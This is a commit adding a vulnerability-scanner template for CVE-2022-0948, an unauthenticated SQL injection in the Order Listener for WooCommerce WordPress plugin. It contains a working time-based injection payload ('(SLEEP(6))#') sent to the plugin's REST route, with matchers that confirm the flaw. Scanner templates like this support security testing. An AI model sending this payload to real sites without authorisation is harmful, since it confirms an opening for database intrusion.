Added template for CVE-2022-0948

2022-12-03 16:34:00 +05:30 · 2022-12-03 16:34:00 +05:30 · f0f87d7c9f
parent b96a429f7b
commit f0f87d7c9f
1 changed files with 44 additions and 0 deletions
--- a/cves/2022/CVE-2022-0948.yaml
+++ b/cves/2022/CVE-2022-0948.yaml
@ -0,0 +1,44 @@
+id: CVE-2022-0948
+
+info:
+  name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi
+  author: theamanrawat
+  severity: critical
+  description: |
+    The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection.
+  reference:
+    - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576
+    - https://wordpress.org/plugins/woc-order-alert/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0948
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0948
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,woc-order-alert,unauth
+
+requests:
+  - raw:
+      - |
+        GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        @timeout: 15s
+        POST /?rest_route=/olistener/new HTTP/1.1
+        Host: {{Hostname}}
+        content-type: application/json
+
+        {"id":" (SLEEP(6))#"}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration_2>=6'
+          - 'status_code_2 == 200'
+          - 'contains(content_type_2, "application/json")'
+          - 'contains(body_1, "olistener-action.olistener-controller")'
+        condition: and